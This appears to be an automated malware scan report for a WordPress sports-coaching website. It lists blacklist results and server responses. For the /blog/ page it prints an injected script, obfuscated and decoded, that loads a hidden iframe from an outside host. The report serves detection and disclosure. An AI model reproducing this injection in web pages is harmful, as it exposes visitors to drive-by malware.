Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yourmentalcoach.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yourmentalcoach.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.yourmentalcoach.com/ | 200 OK Content-Length: 22098 Content-Type: text/html | clean |
http://www.yourmentalcoach.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 04:36:40 GMT Pragma: no-cache Location: http://www.yourmentalcoach.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.yourmentalcoach.com/xmlrpc.php X-Powered-By: PHP/5.3.10-1ubuntu3.8 | clean |
http://www.yourmentalcoach.com/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 15755 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/about/ | 200 OK Content-Length: 23981 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/blog/ | 200 OK Content-Length: 51675 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,333,100,210 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://odiwmklhah.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://odiwmklhah.findhere.org/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','1 <iframe src='http://odiwmklhah.findhere.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.yourmentalcoach.com/training/ | 200 OK Content-Length: 24296 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/products/ | 200 OK Content-Length: 38420 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/get-in-touch/ | 200 OK Content-Length: 16820 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/category/basketball/ | 200 OK Content-Length: 35833 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/2011/06/09/update-on-andrew-goudelock/ | 200 OK Content-Length: 20552 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.yourmentalcoach.com%2F2011%2F06%2F09%2Fupdate-on-andrew-goudelock%2F | 200 OK Content-Length: 2443 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 2056 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/wp-login.php | 200 OK Content-Length: 2414 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/test404page.js | 404 Not Found Content-Length: 15755 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/category/comments/ | 200 OK Content-Length: 20579 Content-Type: text/html | clean |
http://www.yourmentalcoach.com/2009/03/12/thank-you-2/ | 200 OK Content-Length: 19000 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yourmentalcoach.com
Result:
GET / HTTP/1.1
Host: yourmentalcoach.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: yourmentalcoach.com
Referer: http://www.google.com/search?q=yourmentalcoach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yourmentalcoach.com
Referer: http://www.google.com/search?q=yourmentalcoach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.